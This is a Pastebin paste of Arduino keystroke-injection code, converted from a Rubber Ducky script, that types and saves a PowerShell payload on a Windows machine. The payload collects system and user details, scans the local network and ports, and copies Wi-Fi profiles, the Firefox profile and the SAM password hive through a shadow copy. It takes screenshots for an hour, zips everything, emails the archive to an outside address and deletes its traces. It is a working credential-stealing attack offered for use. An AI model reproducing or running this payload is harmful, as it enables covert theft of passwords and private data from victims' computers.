API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 30th, 2016
143
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.41 KB | None | 0 0
raw download clone embed print report
  1. /* Converted by Duckuino:
  2. * https://forums.hak5.org/index.php?/topic/32719-payload-converter-duckuino-duckyscript-to-arduino/?p=244590
  3. * Enjoy!
  4. */
  5. void setup() {
  6. Keyboard.begin();
  7. delay(750);
  8.  
  9. type(KEY_LEFT_GUI,false);
  10. type('r',false);
  11. Keyboard.releaseAll();
  12. delay(750);
  13.  
  14. print(F("powershell Start-Process notepad -Verb runAs"));
  15.  
  16. type(KEY_RETURN,false);
  17. Keyboard.releaseAll();
  18. delay(750);
  19.  
  20. type(KEY_LEFT_ALT,false);
  21. type('y',false);
  22. Keyboard.releaseAll();
  23. delay(750);
  24.  
  25. type(KEY_RETURN,false);
  26. Keyboard.releaseAll();
  27.  
  28. type(KEY_LEFT_ALT,false);
  29. Keyboard.releaseAll();
  30. delay(750);
  31.  
  32. print(F("m"));
  33. delay(750);
  34. for(int i = 0; i < 51; i++) {
  35.  
  36. type(KEY_DOWN_ARROW,false);
  37. Keyboard.releaseAll();
  38. }
  39.  
  40. type(KEY_RETURN,false);
  41. Keyboard.releaseAll();
  42.  
  43. print(F("$folderDateTime = (get-date).ToString('d-M-y HHmmss')"));
  44.  
  45. type(KEY_RETURN,false);
  46. Keyboard.releaseAll();
  47.  
  48. print(F("$userDir = (Get-ChildItem env:\\userprofile).value + '\\Ducky Report ' + $folderDateTime"));
  49.  
  50. type(KEY_RETURN,false);
  51. Keyboard.releaseAll();
  52.  
  53. print(F("$fileSaveDir = New-Item ($userDir) -ItemType Directory"));
  54.  
  55. type(KEY_RETURN,false);
  56. Keyboard.releaseAll();
  57.  
  58. print(F("$date = get-date"));
  59.  
  60. type(KEY_RETURN,false);
  61. Keyboard.releaseAll();
  62.  
  63. print(F("$style = \"<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>\""));
  64.  
  65. type(KEY_RETURN,false);
  66. Keyboard.releaseAll();
  67.  
  68. print(F("$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'"));
  69.  
  70. type(KEY_RETURN,false);
  71. Keyboard.releaseAll();
  72.  
  73. print(F("$Report = $Report +\"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>\""));
  74.  
  75. type(KEY_RETURN,false);
  76. Keyboard.releaseAll();
  77.  
  78. print(F("$SysBootTime = Get-WmiObject Win32_OperatingSystem"));
  79.  
  80. type(KEY_RETURN,false);
  81. Keyboard.releaseAll();
  82.  
  83. print(F("$BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime"));
  84.  
  85. type(KEY_RETURN,false);
  86. Keyboard.releaseAll();
  87.  
  88. print(F("$SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)"));
  89.  
  90. type(KEY_RETURN,false);
  91. Keyboard.releaseAll();
  92.  
  93. print(F("$SerialNo = $SysSerialNo.SerialNumber"));
  94.  
  95. type(KEY_RETURN,false);
  96. Keyboard.releaseAll();
  97.  
  98. print(F("$SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model"));
  99.  
  100. type(KEY_RETURN,false);
  101. Keyboard.releaseAll();
  102.  
  103. print(F("$SysManufacturer = $SysInfo.Manufacturer"));
  104.  
  105. type(KEY_RETURN,false);
  106. Keyboard.releaseAll();
  107.  
  108. print(F("$SysModel = $SysInfo.Model"));
  109.  
  110. type(KEY_RETURN,false);
  111. Keyboard.releaseAll();
  112.  
  113. print(F("$OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption"));
  114.  
  115. type(KEY_RETURN,false);
  116. Keyboard.releaseAll();
  117.  
  118. print(F("$disk = Get-WmiObject Win32_LogicalDisk -Filter \"DeviceID='C:'\""));
  119.  
  120. type(KEY_RETURN,false);
  121. Keyboard.releaseAll();
  122.  
  123. print(F("$HD = [math]::truncate($disk.Size / 1GB)"));
  124.  
  125. type(KEY_RETURN,false);
  126. Keyboard.releaseAll();
  127.  
  128. print(F("$FreeSpace = [math]::truncate($disk.FreeSpace / 1GB)"));
  129.  
  130. type(KEY_RETURN,false);
  131. Keyboard.releaseAll();
  132.  
  133. print(F("$SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize"));
  134.  
  135. type(KEY_RETURN,false);
  136. Keyboard.releaseAll();
  137.  
  138. print(F("$Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB)"));
  139.  
  140. type(KEY_RETURN,false);
  141. Keyboard.releaseAll();
  142.  
  143. print(F("$SysCpu = Get-WmiObject Win32_Processor | Select Name"));
  144.  
  145. type(KEY_RETURN,false);
  146. Keyboard.releaseAll();
  147.  
  148. print(F("$Cpu = $SysCpu.Name"));
  149.  
  150. type(KEY_RETURN,false);
  151. Keyboard.releaseAll();
  152.  
  153. print(F("$HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber"));
  154.  
  155. type(KEY_RETURN,false);
  156. Keyboard.releaseAll();
  157.  
  158. print(F("$HardSerialNo = $HardSerial.SerialNumber"));
  159.  
  160. type(KEY_RETURN,false);
  161. Keyboard.releaseAll();
  162.  
  163. print(F("$SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name"));
  164.  
  165. type(KEY_RETURN,false);
  166. Keyboard.releaseAll();
  167.  
  168. print(F("$graphicsCard = gwmi win32_VideoController |select Name"));
  169.  
  170. type(KEY_RETURN,false);
  171. Keyboard.releaseAll();
  172.  
  173. print(F("$graphics = $graphicsCard.Name"));
  174.  
  175. type(KEY_RETURN,false);
  176. Keyboard.releaseAll();
  177.  
  178. print(F("$SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1"));
  179.  
  180. type(KEY_RETURN,false);
  181. Keyboard.releaseAll();
  182.  
  183. print(F("$DriveLetter = $CDDrive.Drive"));
  184.  
  185. type(KEY_RETURN,false);
  186. Keyboard.releaseAll();
  187.  
  188. print(F("$DriveName = $CDDrive.Caption"));
  189.  
  190. type(KEY_RETURN,false);
  191. Keyboard.releaseAll();
  192.  
  193. print(F("$Disk = $DriveLetter + '' + $DriveName"));
  194.  
  195. type(KEY_RETURN,false);
  196. Keyboard.releaseAll();
  197.  
  198. print(F("$Firewall = New-Object -com HNetCfg.FwMgr"));
  199.  
  200. type(KEY_RETURN,false);
  201. Keyboard.releaseAll();
  202.  
  203. print(F("$FireProfile = $Firewall.LocalPolicy.CurrentProfile"));
  204.  
  205. type(KEY_RETURN,false);
  206. Keyboard.releaseAll();
  207.  
  208. print(F("$FireProfile = $FireProfile.FirewallEnabled"));
  209.  
  210. type(KEY_RETURN,false);
  211. Keyboard.releaseAll();
  212.  
  213. print(F("$Report = $Report + \"<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>\""));
  214.  
  215. type(KEY_RETURN,false);
  216. Keyboard.releaseAll();
  217.  
  218. print(F("$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired"));
  219.  
  220. type(KEY_RETURN,false);
  221. Keyboard.releaseAll();
  222.  
  223. print(F("$UserType = $UserInfo.AccountType"));
  224.  
  225. type(KEY_RETURN,false);
  226. Keyboard.releaseAll();
  227.  
  228. print(F("$UserSid = $UserInfo.SID"));
  229.  
  230. type(KEY_RETURN,false);
  231. Keyboard.releaseAll();
  232.  
  233. print(F("$UserPass = $UserInfo.PasswordRequired"));
  234.  
  235. type(KEY_RETURN,false);
  236. Keyboard.releaseAll();
  237.  
  238. print(F("$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')"));
  239.  
  240. type(KEY_RETURN,false);
  241. Keyboard.releaseAll();
  242.  
  243. print(F("$Report = $Report +\"<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>\""));
  244.  
  245. type(KEY_RETURN,false);
  246. Keyboard.releaseAll();
  247.  
  248. print(F("$Report = $Report + '</div>'"));
  249.  
  250. type(KEY_RETURN,false);
  251. Keyboard.releaseAll();
  252.  
  253. print(F(" $u = 0"));
  254.  
  255. type(KEY_RETURN,false);
  256. Keyboard.releaseAll();
  257.  
  258. print(F("$allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace)"));
  259.  
  260. type(KEY_RETURN,false);
  261. Keyboard.releaseAll();
  262.  
  263. print(F("$Report = $Report + '<div id=right><h3>USB Devices</h3><table>'"));
  264.  
  265. type(KEY_RETURN,false);
  266. Keyboard.releaseAll();
  267.  
  268. print(F("do {"));
  269.  
  270. type(KEY_RETURN,false);
  271. Keyboard.releaseAll();
  272.  
  273. print(F("$gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)"));
  274.  
  275. type(KEY_RETURN,false);
  276. Keyboard.releaseAll();
  277.  
  278. print(F("$Report = $Report + \"<tr><td>Drive Name: </td><td> + \" $allUsb[$u].Name + $allUsb[$u].Label + \"</td><td>Free Space: </td><td>\" + $gbUSB + \"GB</td></tr>STRING Write-Output $fullUSB\""));
  279.  
  280. type(KEY_RETURN,false);
  281. Keyboard.releaseAll();
  282.  
  283. print(F("$u ++"));
  284.  
  285. type(KEY_RETURN,false);
  286. Keyboard.releaseAll();
  287.  
  288. print(F("} while ($u -lt $allUsb.Count)"));
  289.  
  290. type(KEY_RETURN,false);
  291. Keyboard.releaseAll();
  292.  
  293. print(F("$Report = $Report + '</table></div>'"));
  294.  
  295. type(KEY_RETURN,false);
  296. Keyboard.releaseAll();
  297.  
  298. print(F("$Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>'"));
  299.  
  300. type(KEY_RETURN,false);
  301. Keyboard.releaseAll();
  302.  
  303. print(F("$Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path)"));
  304.  
  305. type(KEY_RETURN,false);
  306. Keyboard.releaseAll();
  307.  
  308. print(F("$Report = $Report + '</div>'"));
  309.  
  310. type(KEY_RETURN,false);
  311. Keyboard.releaseAll();
  312.  
  313. print(F("$Report = $Report + '<div id=center><h3> Installed Programs</h3> '"));
  314.  
  315. type(KEY_RETURN,false);
  316. Keyboard.releaseAll();
  317.  
  318. print(F("$Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate)"));
  319.  
  320. type(KEY_RETURN,false);
  321. Keyboard.releaseAll();
  322.  
  323. print(F("$Report = $Report + '</table></div>'"));
  324.  
  325. type(KEY_RETURN,false);
  326. Keyboard.releaseAll();
  327.  
  328. print(F("$Report = $Report + '<div id=center><h3> Installed Updates</h3>'"));
  329.  
  330. type(KEY_RETURN,false);
  331. Keyboard.releaseAll();
  332.  
  333. print(F("$Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy)"));
  334.  
  335. type(KEY_RETURN,false);
  336. Keyboard.releaseAll();
  337.  
  338. print(F("$Report = $Report + '</div>'"));
  339.  
  340. type(KEY_RETURN,false);
  341. Keyboard.releaseAll();
  342.  
  343. print(F("$Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>'"));
  344.  
  345. type(KEY_RETURN,false);
  346. Keyboard.releaseAll();
  347.  
  348. print(F("$Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)"));
  349.  
  350. type(KEY_RETURN,false);
  351. Keyboard.releaseAll();
  352.  
  353. print(F("$Report = $Report + '</div>'"));
  354.  
  355. type(KEY_RETURN,false);
  356. Keyboard.releaseAll();
  357.  
  358. print(F("$Report = $Report + '<div id=center><h3>Network Information</h3>'"));
  359.  
  360. type(KEY_RETURN,false);
  361. Keyboard.releaseAll();
  362.  
  363. print(F("$Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html)"));
  364.  
  365. type(KEY_RETURN,false);
  366. Keyboard.releaseAll();
  367.  
  368. print(F("$Report = $Report + '</table></div>'"));
  369.  
  370. type(KEY_RETURN,false);
  371. Keyboard.releaseAll();
  372.  
  373. print(F("$IP = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True' | Select IPAddress -First 1"));
  374.  
  375. type(KEY_RETURN,false);
  376. Keyboard.releaseAll();
  377.  
  378. print(F("$IPAddr = $IP.IPAddress | Select-Object -Index 0"));
  379.  
  380. type(KEY_RETURN,false);
  381. Keyboard.releaseAll();
  382.  
  383. print(F("$IPAddr -as [String]"));
  384.  
  385. type(KEY_RETURN,false);
  386. Keyboard.releaseAll();
  387.  
  388. print(F("$IPa = $IPAddr.Split('.') | Select -Index 0"));
  389.  
  390. type(KEY_RETURN,false);
  391. Keyboard.releaseAll();
  392.  
  393. print(F("$IPb = $IPAddr.Split('.') | Select -Index 1"));
  394.  
  395. type(KEY_RETURN,false);
  396. Keyboard.releaseAll();
  397.  
  398. print(F("$IPc = $IPAddr.Split('.') | Select -Index 2"));
  399.  
  400. type(KEY_RETURN,false);
  401. Keyboard.releaseAll();
  402.  
  403. print(F("$IPAddr = $IPa + '.' + $IPb + '.' + $IPc + '.'"));
  404.  
  405. type(KEY_RETURN,false);
  406. Keyboard.releaseAll();
  407.  
  408. print(F("$Ping = new-object System.Net.Networkinformation.Ping"));
  409.  
  410. type(KEY_RETURN,false);
  411. Keyboard.releaseAll();
  412.  
  413. print(F("$ScanResults = 1..255| ForEach-Object {($Ping).Send($IpAddr + $_) } | Where-Object {$_.Status -eq 'Success'} | select Address"));
  414.  
  415. type(KEY_RETURN,false);
  416. Keyboard.releaseAll();
  417.  
  418. print(F("$x = 0"));
  419.  
  420. type(KEY_RETURN,false);
  421. Keyboard.releaseAll();
  422.  
  423. print(F("$Report = $Report + '<div id=center><h3>Network Scan Results</h3><table>'"));
  424.  
  425. type(KEY_RETURN,false);
  426. Keyboard.releaseAll();
  427.  
  428. print(F("do {"));
  429.  
  430. type(KEY_RETURN,false);
  431. Keyboard.releaseAll();
  432.  
  433. print(F("$IPResults = $ScanResults | Select-Object -Index $x"));
  434.  
  435. type(KEY_RETURN,false);
  436. Keyboard.releaseAll();
  437.  
  438. print(F("$CompInfo = Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address | Select RegisteredUser, SystemDirectory"));
  439.  
  440. type(KEY_RETURN,false);
  441. Keyboard.releaseAll();
  442.  
  443. print(F("$CompName = (Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address).csname"));
  444.  
  445. type(KEY_RETURN,false);
  446. Keyboard.releaseAll();
  447.  
  448. print(F("$CurrIP = $IPResults.Address.IPAddressToString"));
  449.  
  450. type(KEY_RETURN,false);
  451. Keyboard.releaseAll();
  452.  
  453. print(F("$CurrOS = $CompInfo.SystemDirectory"));
  454.  
  455. type(KEY_RETURN,false);
  456. Keyboard.releaseAll();
  457.  
  458. print(F("$CurrName = $CompInfo.RegisteredUser"));
  459.  
  460. type(KEY_RETURN,false);
  461. Keyboard.releaseAll();
  462.  
  463. print(F("if ($CompInfo -ne $null){"));
  464.  
  465. type(KEY_RETURN,false);
  466. Keyboard.releaseAll();
  467.  
  468. print(F("$Report = $Report + '<tr><td><b>IP Address:</b></td><td>' + $CurrIP + '</td><td><b>Compter Name: </b></td><td>' + $CompName + '</td><td><b>User Name: </b></td><td>' + $CurrName + '</td> <td><b>OS:</b> </td><td>' + $CurrOS + '</td></tr><br>'"));
  469.  
  470. type(KEY_RETURN,false);
  471. Keyboard.releaseAll();
  472.  
  473. print(F("}else{"));
  474.  
  475. type(KEY_RETURN,false);
  476. Keyboard.releaseAll();
  477.  
  478. print(F("$Report = $Report + '<tr><td><b>IP Address: </b></td><td>' + $CurrIP + '</td><td><b>Computer Name: </b></td><td>NOT KNOWN</td><td><b>User Name: </b></td><td>NOT KNOWN</td><td><b>OS:</b></td><td>NOT KNOWN</td></tr><br>'}"));
  479.  
  480. type(KEY_RETURN,false);
  481. Keyboard.releaseAll();
  482.  
  483. print(F("$x ++"));
  484.  
  485. type(KEY_RETURN,false);
  486. Keyboard.releaseAll();
  487.  
  488. print(F("} while ($x -lt $ScanResults.Count)"));
  489.  
  490. type(KEY_RETURN,false);
  491. Keyboard.releaseAll();
  492.  
  493. print(F("$Report = $Report + '</table></div>'"));
  494.  
  495. type(KEY_RETURN,false);
  496. Keyboard.releaseAll();
  497.  
  498. print(F("$Computer = $env:COMPUTERNAME"));
  499.  
  500. type(KEY_RETURN,false);
  501. Keyboard.releaseAll();
  502.  
  503. print(F("$PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080"));
  504.  
  505. type(KEY_RETURN,false);
  506. Keyboard.releaseAll();
  507.  
  508. print(F("$Report = $Report + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>'"));
  509.  
  510. type(KEY_RETURN,false);
  511. Keyboard.releaseAll();
  512.  
  513. print(F("foreach ($PortNumber in $PortList) {"));
  514.  
  515. type(KEY_RETURN,false);
  516. Keyboard.releaseAll();
  517.  
  518. print(F("$PortCheck = New-Object Net.Sockets.TcpClient"));
  519.  
  520. type(KEY_RETURN,false);
  521. Keyboard.releaseAll();
  522.  
  523. print(F("$PortCheck.Connect($Computer, $PortNumber)"));
  524.  
  525. type(KEY_RETURN,false);
  526. Keyboard.releaseAll();
  527.  
  528. print(F("if ($PortCheck.Connected) {"));
  529.  
  530. type(KEY_RETURN,false);
  531. Keyboard.releaseAll();
  532.  
  533. print(F("$Report = $Report + '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'}"));
  534.  
  535. type(KEY_RETURN,false);
  536. Keyboard.releaseAll();
  537.  
  538. print(F("else {$Report = $Report + '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}}"));
  539.  
  540. type(KEY_RETURN,false);
  541. Keyboard.releaseAll();
  542.  
  543. print(F("$Report = $Report + '</table></div>'"));
  544.  
  545. type(KEY_RETURN,false);
  546. Keyboard.releaseAll();
  547.  
  548. print(F("$wlanSaveDir = New-Item $userDir'/Duck/WLAN_PROFILES' -ItemType Directory"));
  549.  
  550. type(KEY_RETURN,false);
  551. Keyboard.releaseAll();
  552.  
  553. print(F("$srcDir = 'C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces'"));
  554.  
  555. type(KEY_RETURN,false);
  556. Keyboard.releaseAll();
  557.  
  558. print(F("Copy-Item $srcDir $wlanSaveDir -Recurse"));
  559.  
  560. type(KEY_RETURN,false);
  561. Keyboard.releaseAll();
  562.  
  563. print(F("$jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory"));
  564.  
  565. type(KEY_RETURN,false);
  566. Keyboard.releaseAll();
  567.  
  568. print(F("$displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth"));
  569.  
  570. type(KEY_RETURN,false);
  571. Keyboard.releaseAll();
  572.  
  573. print(F("$displayWidth = $displayInfo.ScreenWidth"));
  574.  
  575. type(KEY_RETURN,false);
  576. Keyboard.releaseAll();
  577.  
  578. print(F("$displayHeight = $displayInfo.ScreenHeight"));
  579.  
  580. type(KEY_RETURN,false);
  581. Keyboard.releaseAll();
  582.  
  583. print(F("[System.Reflection.Assembly]::LoadWithPartialName(\"System.Drawing\")"));
  584.  
  585. type(KEY_RETURN,false);
  586. Keyboard.releaseAll();
  587.  
  588. print(F("$x = 0"));
  589.  
  590. type(KEY_RETURN,false);
  591. Keyboard.releaseAll();
  592.  
  593. print(F("do { Start-Sleep -Seconds 60"));
  594.  
  595. type(KEY_RETURN,false);
  596. Keyboard.releaseAll();
  597.  
  598. print(F("$jpegName = (get-date).ToString('HHmmss')"));
  599.  
  600. type(KEY_RETURN,false);
  601. Keyboard.releaseAll();
  602.  
  603. print(F("$image = new-object System.Drawing.Bitmap 1366 ,768"));
  604.  
  605. type(KEY_RETURN,false);
  606. Keyboard.releaseAll();
  607.  
  608. print(F("$imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight"));
  609.  
  610. type(KEY_RETURN,false);
  611. Keyboard.releaseAll();
  612.  
  613. print(F("$screen = [System.Drawing.Graphics]::FromImage($image)"));
  614.  
  615. type(KEY_RETURN,false);
  616. Keyboard.releaseAll();
  617.  
  618. print(F("$screen.copyfromscreen(0,0,0,0, $imageSize,([System.Drawing.CopyPixelOperation]::SourceCopy))"));
  619.  
  620. type(KEY_RETURN,false);
  621. Keyboard.releaseAll();
  622.  
  623. print(F("$image.Save(\"$jpegSaveDir/$jpegName.jpeg\",([system.drawing.imaging.imageformat]::jpeg));"));
  624.  
  625. type(KEY_RETURN,false);
  626. Keyboard.releaseAll();
  627.  
  628. print(F("$x++ } while ($x -ne 60);"));
  629.  
  630. type(KEY_RETURN,false);
  631. Keyboard.releaseAll();
  632.  
  633. print(F(" $fireSaveDir = New-Item $userDir'\\Duck\\FireFox-Profile' -ItemType Directory"));
  634.  
  635. type(KEY_RETURN,false);
  636. Keyboard.releaseAll();
  637.  
  638. print(F("$fireDir = $userDir + '\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'"));
  639.  
  640. type(KEY_RETURN,false);
  641. Keyboard.releaseAll();
  642.  
  643. print(F("$getFire = Get-Item -Path $fireDir -Exclude extensions"));
  644.  
  645. type(KEY_RETURN,false);
  646. Keyboard.releaseAll();
  647.  
  648. print(F("Copy-Item $getFire $fireSaveDir -Recurse"));
  649.  
  650. type(KEY_RETURN,false);
  651. Keyboard.releaseAll();
  652.  
  653. print(F("Start-Sleep -s 10"));
  654.  
  655. type(KEY_RETURN,false);
  656. Keyboard.releaseAll();
  657.  
  658. print(F("$createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\\', 'ClientAccessible')"));
  659.  
  660. type(KEY_RETURN,false);
  661. Keyboard.releaseAll();
  662.  
  663. print(F("$shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }"));
  664.  
  665. type(KEY_RETURN,false);
  666. Keyboard.releaseAll();
  667.  
  668. print(F("$addSlash = $shadow.DeviceObject + ''"));
  669.  
  670. type(KEY_RETURN,false);
  671. Keyboard.releaseAll();
  672.  
  673. print(F("cmd /c mklink C:\\shadowcopy $addSlash"));
  674.  
  675. type(KEY_RETURN,false);
  676. Keyboard.releaseAll();
  677.  
  678. print(F("Copy-Item 'C:\\shadowcopy\\Windows\\System32\\config\\SAM' $fileSaveDir"));
  679.  
  680. type(KEY_RETURN,false);
  681. Keyboard.releaseAll();
  682.  
  683. print(F("Remove-Item -recurse -force 'C:\\shadowcopy'"));
  684.  
  685. type(KEY_RETURN,false);
  686. Keyboard.releaseAll();
  687.  
  688. print(F("$Report >> $fileSaveDir'/ComputerInfo.html'"));
  689.  
  690. type(KEY_RETURN,false);
  691. Keyboard.releaseAll();
  692.  
  693. print(F("function copy-ToZip($fileSaveDir){"));
  694.  
  695. type(KEY_RETURN,false);
  696. Keyboard.releaseAll();
  697.  
  698. print(F("$srcdir = $fileSaveDir"));
  699.  
  700. type(KEY_RETURN,false);
  701. Keyboard.releaseAll();
  702.  
  703. print(F("$zipFile = 'C:\\Windows\\Report.zip'"));
  704.  
  705. type(KEY_RETURN,false);
  706. Keyboard.releaseAll();
  707.  
  708. print(F("if(-not (test-path($zipFile))) {"));
  709.  
  710. type(KEY_RETURN,false);
  711. Keyboard.releaseAll();
  712.  
  713. print(F("set-content $zipFile (\"PK\" + [char]5 + [char]6 + (\"$([char]0)\" * 18))"));
  714.  
  715. type(KEY_RETURN,false);
  716. Keyboard.releaseAll();
  717.  
  718. print(F("(dir $zipFile).IsReadOnly = $false}"));
  719.  
  720. type(KEY_RETURN,false);
  721. Keyboard.releaseAll();
  722.  
  723. print(F("$shellApplication = new-object -com shell.application"));
  724.  
  725. type(KEY_RETURN,false);
  726. Keyboard.releaseAll();
  727.  
  728. print(F("$zipPackage = $shellApplication.NameSpace($zipFile)"));
  729.  
  730. type(KEY_RETURN,false);
  731. Keyboard.releaseAll();
  732.  
  733. print(F("$files = Get-ChildItem -Path $srcdir"));
  734.  
  735. type(KEY_RETURN,false);
  736. Keyboard.releaseAll();
  737.  
  738. print(F("foreach($file in $files) {"));
  739.  
  740. type(KEY_RETURN,false);
  741. Keyboard.releaseAll();
  742.  
  743. print(F("$zipPackage.CopyHere($file.FullName)"));
  744.  
  745. type(KEY_RETURN,false);
  746. Keyboard.releaseAll();
  747.  
  748. print(F("while($zipPackage.Items().Item($file.name) -eq $null){"));
  749.  
  750. type(KEY_RETURN,false);
  751. Keyboard.releaseAll();
  752.  
  753. print(F("Start-sleep -seconds 1 }}}"));
  754.  
  755. type(KEY_RETURN,false);
  756. Keyboard.releaseAll();
  757.  
  758. print(F("copy-ToZip($fileSaveDir)"));
  759.  
  760. type(KEY_RETURN,false);
  761. Keyboard.releaseAll();
  762.  
  763. print(F("$SMTPServer = 'smtp.gmail.com'"));
  764.  
  765. type(KEY_RETURN,false);
  766. Keyboard.releaseAll();
  767.  
  768. print(F("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)"));
  769.  
  770. type(KEY_RETURN,false);
  771. Keyboard.releaseAll();
  772.  
  773. print(F("$SMTPInfo.EnableSsl = $true"));
  774.  
  775. type(KEY_RETURN,false);
  776. Keyboard.releaseAll();
  777.  
  778. print(F("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential'mail', 'psswd');"));
  779.  
  780. type(KEY_RETURN,false);
  781. Keyboard.releaseAll();
  782.  
  783. print(F("$ReportEmail = New-Object System.Net.Mail.MailMessage"));
  784.  
  785. type(KEY_RETURN,false);
  786. Keyboard.releaseAll();
  787.  
  788. print(F("$ReportEmail.From = 'tim241@ziggo.nl'"));
  789.  
  790. type(KEY_RETURN,false);
  791. Keyboard.releaseAll();
  792.  
  793. print(F("$ReportEmail.To.Add('tim241@ziggo.nl')"));
  794.  
  795. type(KEY_RETURN,false);
  796. Keyboard.releaseAll();
  797.  
  798. print(F("$ReportEmail.Subject = 'Duck Toolkit Recon Report'"));
  799.  
  800. type(KEY_RETURN,false);
  801. Keyboard.releaseAll();
  802.  
  803. print(F("$ReportEmail.Body = 'Please find attached your reconnaissance report.'"));
  804.  
  805. type(KEY_RETURN,false);
  806. Keyboard.releaseAll();
  807.  
  808. print(F("$ReportEmail.Attachments.Add('C:\\Windows\\Report.zip')"));
  809.  
  810. type(KEY_RETURN,false);
  811. Keyboard.releaseAll();
  812.  
  813. print(F("$SMTPInfo.Send($ReportEmail)"));
  814.  
  815. type(KEY_RETURN,false);
  816. Keyboard.releaseAll();
  817.  
  818. print(F("remove-item $fileSaveDir -recurse"));
  819.  
  820. type(KEY_RETURN,false);
  821. Keyboard.releaseAll();
  822.  
  823. print(F("remove-item 'C:\\Windows\\Report.zip'"));
  824.  
  825. type(KEY_RETURN,false);
  826. Keyboard.releaseAll();
  827.  
  828. print(F("Remove-Item $MyINvocation.InvocationName"));
  829.  
  830. type(KEY_RETURN,false);
  831. Keyboard.releaseAll();
  832.  
  833. type(KEY_LEFT_CTRL,false);
  834. type('S',false);
  835. Keyboard.releaseAll();
  836. delay( 750);
  837.  
  838. print(F("C:\\Windows\\config-6fee6.ps1"));
  839.  
  840. type(KEY_RETURN,false);
  841. Keyboard.releaseAll();
  842. delay(750);
  843.  
  844. type(KEY_LEFT_ALT,false);
  845. type('F',false);
  846. Keyboard.releaseAll();
  847. delay(750);
  848.  
  849. type(KEY_LEFT_GUI,false);
  850. type('r',false);
  851. Keyboard.releaseAll();
  852. delay(750);
  853.  
